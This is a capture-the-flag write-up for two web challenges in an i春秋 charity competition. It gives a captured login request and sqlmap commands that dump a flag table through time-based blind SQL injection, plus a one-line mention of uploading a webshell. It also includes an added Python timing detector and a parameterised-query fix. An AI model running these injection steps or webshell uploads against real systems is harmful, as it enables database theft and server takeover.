WP-2020-i春秋 Charity Competition

# Web

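Simple Recruitment System

The page shows only a login and registration form, so SQL injection is the first thing to try.

sqlmap handles it in one go: time-based blind injection.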

request.txt

```http
POST / HTTP/1.1
Host: 49a79616cf9b4a298fd6565dd2a47b9e677d5c1cefdf49bb.changame.ichunqiu.com
Content-Length: 20
Cache-Control: max-age=0
Origin: http://49a79616cf9b4a298fd6565dd2a47b9e677d5c1cefdf49bb.changame.ichunqiu.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://49a79616cf9b4a298fd6565dd2a47b9e677d5c1cefdf49bb.changame.ichunqiu.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=s3tiim20hpc0lf3mtg3n0i9c61; __jsluid_h=f3395e6f72d5b3e0a71bbcc240759bae
Connection: close

lname=user&lpass=123
```
```bash
# Current database
python2 sqlmap.py -r request.txt --dbms mysql -p "lname" --time-sec="1" --current-db
# Tables
python2 sqlmap.py -r request.txt --dbms mysql -p "lname" --time-sec="1" -v 3 -D nzhaopin --tables
# Columns
python2 sqlmap.py -r request.txt --dbms mysql -p "lname" --time-sec="1" -D nzhaopin -T flag --columns
# Column values (dump)
python2 sqlmap.py -r request.txt --dbms mysql -p "lname" --time-sec="1" -D nzhaopin -T flag -C flaaag --dump
```
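From the defender's side, time-based blind extraction like the run above leaves a recognizable trace in request timing: one client sends many POSTs to the login endpoint, and its response times split into a fast cluster and a cluster shifted by the injected delay (1 second here, matching `--time-sec="1"`). The following is an added example, not part of the original writeup; the record layout, function names, thresholds and sample data are assumptions constructed for illustration.

```python
from collections import defaultdict


def find_delay_probing(records, min_requests=20, delay=1.0, tolerance=0.3, min_cluster=5):
    """Flag (client, path) pairs whose POST latencies are bimodal with a gap of ~delay.

    records: iterable of (client_ip, method, path, response_seconds); assumed log shape.
    Returns {(client_ip, path): number_of_delayed_responses}.
    """
    groups = defaultdict(list)
    for client, method, path, seconds in records:
        if method == "POST":
            groups[(client, path)].append(seconds)

    flagged = {}
    for key, times in groups.items():
        if len(times) < min_requests:
            continue  # too few requests to say anything about the distribution
        times.sort()
        baseline = times[len(times) // 10]  # 10th percentile = normal fast-path latency
        slow = [t for t in times if abs((t - baseline) - delay) <= tolerance]
        fast = [t for t in times if t - baseline < delay - tolerance]
        # Both clusters must be populated: a fast one and one shifted by the delay.
        if len(slow) >= min_cluster and len(fast) >= min_cluster:
            flagged[key] = len(slow)
    return flagged


def build_sample():
    """Constructed sample records (documentation-range IPs), not real log data."""
    records = []
    for i in range(40):  # scanner-like client: every third response delayed by ~1 s
        seconds = 1.05 + (i % 4) * 0.01 if i % 3 == 0 else 0.05 + (i % 5) * 0.01
        records.append(("203.0.113.7", "POST", "/", seconds))
    for i in range(30):  # ordinary client: consistently fast logins
        records.append(("198.51.100.4", "POST", "/", 0.04 + (i % 6) * 0.01))
    # A single slow response from a low-volume client must not be flagged.
    records += [("192.0.2.9", "POST", "/", 3.2), ("192.0.2.9", "POST", "/", 0.05)]
    return records


if __name__ == "__main__":
    for (client, path), count in find_delay_probing(build_sample()).items():
        print(f"{client} -> POST {path}: {count} responses delayed by ~1s")
```

The underlying fix remains binding `lname` and `lpass` as query parameters rather than concatenating them into the SQL string; timing analysis only surfaces the probing.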

ezupload

Upload a small webshell and read /readflag directly.
